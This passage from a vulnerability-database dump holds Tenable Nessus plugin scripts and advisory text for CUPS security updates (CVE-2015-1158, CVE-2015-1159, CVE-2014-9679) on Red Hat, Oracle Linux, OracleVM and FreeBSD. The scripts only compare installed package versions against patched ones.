CUPS scheduler to the 'localhost'\nor loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found\nin the way cups handled compressed raster image files. An attacker\ncould create a specially crafted image file, which when passed via the\ncups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158\nand CVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthis update, the cupsd daemon will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:1123\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1158\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1159\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-9679\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups-ipptool\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups-lpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cups-php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/02/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:1123\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"cups-1.4.2-67.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"cups-1.4.2-67.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"cups-1.4.2-67.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"cups-debuginfo-1.4.2-67.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"cups-devel-1.4.2-67.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"cups-libs-1.4.2-67.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"cups-lpd-1.4.2-67.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"cups-lpd-1.4.2-67.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"cups-lpd-1.4.2-67.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"cups-php-1.4.2-67.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"cups-php-1.4.2-67.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"cups-php-1.4.2-67.el6_6.1\")) flag++;\n\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"cups-1.6.3-17.el7_1.1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"cups-1.6.3-17.el7_1.1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"cups-client-1.6.3-17.el7_1.1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"cups-client-1.6.3-17.el7_1.1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"cups-debuginfo-1.6.3-17.el7_1.1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"cups-devel-1.6.3-17.el7_1.1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"cups-filesystem-1.6.3-17.el7_1.1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"cups-ipptool-1.6.3-17.el7_1.1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"cups-ipptool-1.6.3-17.el7_1.1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"cups-libs-1.6.3-17.el7_1.1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"cups-lpd-1.6.3-17.el7_1.1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"cups-lpd-1.6.3-17.el7_1.1\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups / cups-client / cups-debuginfo / cups-devel / cups-filesystem / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:49:57", "description": "From Red Hat Security Advisory 2015:1123 :\n\nUpdated cups packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nCUPS provides a portable printing layer for Linux, UNIX, and similar\noperating systems.\n\nA string reference count bug was found in cupsd, causing premature\nfreeing of string objects. An attacker can submit a malicious print\njob that exploits this flaw to dismantle ACLs protecting privileged\noperations, allowing a replacement configuration file to be uploaded\nwhich in turn allows the attacker to run arbitrary code in the CUPS\nserver (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating\nengine. An attacker could use this flaw to bypass the default\nconfiguration settings that bind the CUPS scheduler to the 'localhost'\nor loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found\nin the way cups handled compressed raster image files. An attacker\ncould create a specially crafted image file, which when passed via the\ncups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158\nand CVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthis update, the cupsd daemon will be restarted automatically.", "edition": 25, "published": "2015-06-18T00:00:00", "title": "Oracle Linux 6 / 7 : cups (ELSA-2015-1123)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "modified": "2015-06-18T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:cups", "p-cpe:/a:oracle:linux:cups-filesystem", "p-cpe:/a:oracle:linux:cups-libs", "p-cpe:/a:oracle:linux:cups-php", "p-cpe:/a:oracle:linux:cups-devel", "p-cpe:/a:oracle:linux:cups-client", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:cups-lpd", "p-cpe:/a:oracle:linux:cups-ipptool"], "id": "ORACLELINUX_ELSA-2015-1123.NASL", "href": "https://www.tenable.com/plugins/nessus/84256", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:1123 and \n# Oracle Linux Security Advisory ELSA-2015-1123 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84256);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-9679\", \"CVE-2015-1158\", \"CVE-2015-1159\");\n script_bugtraq_id(72594, 75098, 75106);\n script_xref(name:\"RHSA\", value:\"2015:1123\");\n\n script_name(english:\"Oracle Linux 6 / 7 : cups (ELSA-2015-1123)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:1123 :\n\nUpdated cups packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nCUPS provides a portable printing layer for Linux, UNIX, and similar\noperating systems.\n\nA string reference count bug was found in cupsd, causing premature\nfreeing of string objects. An attacker can submit a malicious print\njob that exploits this flaw to dismantle ACLs protecting privileged\noperations, allowing a replacement configuration file to be uploaded\nwhich in turn allows the attacker to run arbitrary code in the CUPS\nserver (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating\nengine. An attacker could use this flaw to bypass the default\nconfiguration settings that bind the CUPS scheduler to the 'localhost'\nor loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found\nin the way cups handled compressed raster image files. An attacker\ncould create a specially crafted image file, which when passed via the\ncups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158\nand CVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthis update, the cupsd daemon will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-June/005129.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-June/005130.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cups packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:cups-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:cups-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:cups-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:cups-ipptool\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:cups-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:cups-lpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:cups-php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/02/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"cups-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"cups-devel-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"cups-libs-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"cups-lpd-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"cups-php-1.4.2-67.el6_6.1\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"cups-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"cups-client-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"cups-devel-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"cups-filesystem-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"cups-ipptool-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"cups-libs-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"cups-lpd-1.6.3-17.el7_1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups / cups-client / cups-devel / cups-filesystem / cups-ipptool / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T13:23:33", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - CVE-2015-1158, CVE-2015-1159, CVE-2014-9679 (bug\n #1229982).", "edition": 26, "published": "2015-06-18T00:00:00", "title": "OracleVM 3.3 : cups (OVMSA-2015-0071)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "modified": "2015-06-18T00:00:00", "cpe": ["cpe:/o:oracle:vm_server:3.3", "p-cpe:/a:oracle:vm:cups", "p-cpe:/a:oracle:vm:cups-libs"], "id": "ORACLEVM_OVMSA-2015-0071.NASL", "href": "https://www.tenable.com/plugins/nessus/84257", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2015-0071.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84257);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2014-9679\", \"CVE-2015-1158\", \"CVE-2015-1159\");\n script_bugtraq_id(72594, 75098, 75106);\n\n script_name(english:\"OracleVM 3.3 : cups (OVMSA-2015-0071)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - CVE-2015-1158, CVE-2015-1159, CVE-2014-9679 (bug\n #1229982).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/oraclevm-errata/2015-June/000319.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected cups / cups-libs packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:cups-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/02/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.3\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"cups-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"cups-libs-1.4.2-67.el6_6.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups / cups-libs\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:48:45", "description": "CUPS development team reports :\n\nThe new release addresses two security vulnerabilities, add\nlocalizations for German and Russian, and includes several general bug\nfixes. Changes include :\n\nSecurity: Fixed CERT VU #810572/CVE-2015-1158/CVE-2015-1159 exploiting\nthe dynamic linker (STR #4609)\n\nSecurity: The scheduler could hang with malformed gzip data (STR\n#4602)", "edition": 22, "published": "2015-06-10T00:00:00", "title": "FreeBSD : cups -- multiple vulnerabilities (a40ec970-0efa-11e5-90e4-d050996490d0)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "modified": "2015-06-10T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:cups-base", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_A40EC9700EFA11E590E4D050996490D0.NASL", "href": "https://www.tenable.com/plugins/nessus/84070", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84070);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-1158\", \"CVE-2015-1159\");\n\n script_name(english:\"FreeBSD : cups -- multiple vulnerabilities (a40ec970-0efa-11e5-90e4-d050996490d0)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CUPS development team reports :\n\nThe new release addresses two security vulnerabilities, add\nlocalizations for German and Russian, and includes several general bug\nfixes. Changes include :\n\nSecurity: Fixed CERT VU #810572/CVE-2015-1158/CVE-2015-1159 exploiting\nthe dynamic linker (STR #4609)\n\nSecurity: The scheduler could hang with malformed gzip data (STR\n#4602)\"\n );\n # https://cups.org/blog.php?L1082\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.cups.org/blog/2015-06-08-cups-2.0.3.html\"\n );\n # https://www.kb.cert.org/vuls/id/810572\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.kb.cert.org/vuls/id/810572/\"\n );\n # https://vuxml.freebsd.org/freebsd/a40ec970-0efa-11e5-90e4-d050996490d0.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?405b2fa9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:cups-base\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n 